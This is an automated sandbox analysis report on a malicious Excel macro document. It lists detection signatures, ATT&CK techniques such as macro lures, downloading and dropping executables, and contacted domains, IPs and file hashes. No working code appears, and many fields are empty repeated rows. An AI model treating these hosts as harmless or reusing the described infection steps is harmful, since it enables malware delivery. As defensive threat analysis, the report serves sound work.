Analysis Report documents-1819557117.xlsm
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for dropped file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Binary string: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | DLL Side-Loading1 | Process Injection1 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol14 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer3 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
12% | ReversingLabs | Win64.Trojan.Wacatac | ||
12% | ReversingLabs | Win64.Trojan.Wacatac |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
runolfsson-jayde07s.ru.com | 8.211.4.209 | true | false | unknown | |
cremin-ian07u.ru.com | 8.211.4.209 | true | false | unknown | |
api.globalsign.cloud | 104.18.25.243 | true | false | unknown | |
cesiroinsurance.com | 67.222.38.97 | true | false | unknown | |
shalombaptistchapel.com | 162.251.80.27 | true | false | unknown | |
innermetransformation.com | 173.201.252.173 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.251.80.27 | shalombaptistchapel.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false | |
67.222.38.97 | cesiroinsurance.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
173.201.252.173 | innermetransformation.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false | |
8.211.4.209 | runolfsson-jayde07s.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 384703 |
Start date: | 09.04.2021 |
Start time: | 16:31:56 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-1819557117.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 31 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/14@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.251.80.27 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
67.222.38.97 | Get hash | malicious | Browse | ||
173.201.252.173 | Get hash | malicious | Browse | ||
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cremin-ian07u.ru.com | Get hash | malicious | Browse |
| |
innermetransformation.com | Get hash | malicious | Browse |
| |
shalombaptistchapel.com | Get hash | malicious | Browse |
| |
api.globalsign.cloud | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
cesiroinsurance.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371006409223425 |
Encrypted: | false |
SSDEEP: | 1536:6cQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:yVQ9DQW+zTXiJ |
MD5: | 47284F10FD58C215804AD06146C2DB1F |
SHA1: | C9D048223A73AA698012103F5FACEFB8C91C9E91 |
SHA-256: | 242CFF97D9B3EC4DDF04A28111084066A8A4EA95D2239939876050CD1B91D999 |
SHA-512: | E56180699854F029FDEC00F55376E643064D5D4E28E404B29D935EEEF86467238F9B23C71AE134B6F426CC1A9D391CE7A8AD638F14EE3E1472DDCEED0B8523BC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
